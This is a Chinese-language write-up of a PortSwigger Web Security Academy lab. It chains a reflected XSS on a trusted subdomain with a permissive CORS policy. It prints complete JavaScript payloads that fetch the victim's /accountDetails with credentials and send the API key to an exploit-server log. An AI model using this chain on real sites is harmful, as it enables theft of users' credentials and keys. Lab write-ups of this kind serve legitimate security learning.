好怪的一道题，本地自己用户exp过了但是远程的却打不通，怀疑是环境问题，

原来CORS策略在生活中非常常见啊

先查看自己用户如何查看apiKey

![image-20240503140536761](C:/Users/86186/Desktop/write-up/BurpSuite/assets/image-20240503140536761.png)

之前xss那么好抽取信息是因为Access-Control-Allow-Origin: *

然后这个限制了子域名于是发现一个可以弹xss的域名（感觉高级一点的web漏洞都是连环攻击）

```
GET /?productId=<script>alert("666")</script>&storeId=1 HTTP/2
Host: stock.0ab3006a04bb7b6f803f037f003b003b.web-security-academy.net
```

然后构造exp即可

```js
  document.location="https://stock.0ab3006a04bb7b6f803f037f003b003b.web-security-academy.net/?productId=<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ab3006a04bb7b6f803f037f003b003b.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0ac2005a04167b01809f02a9015900da.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"

```

然后即可从log中获取apikey，这里只获取到了本地用户的，不知道为什么远程exp打不通

换了一个exp可以打通的

```
<script>
    document.location="http://stock.0ab3006a04bb7b6f803f037f003b003b.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ab3006a04bb7b6f803f037f003b003b.web-security-academy.net/accountDetails',true); req.withCredentials = true;req.send();function reqListener() {location='https://exploit-0ac2005a04167b01809f02a9015900da.exploit-server.net/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>

```

太怪了就打通了一次后面就没有打通了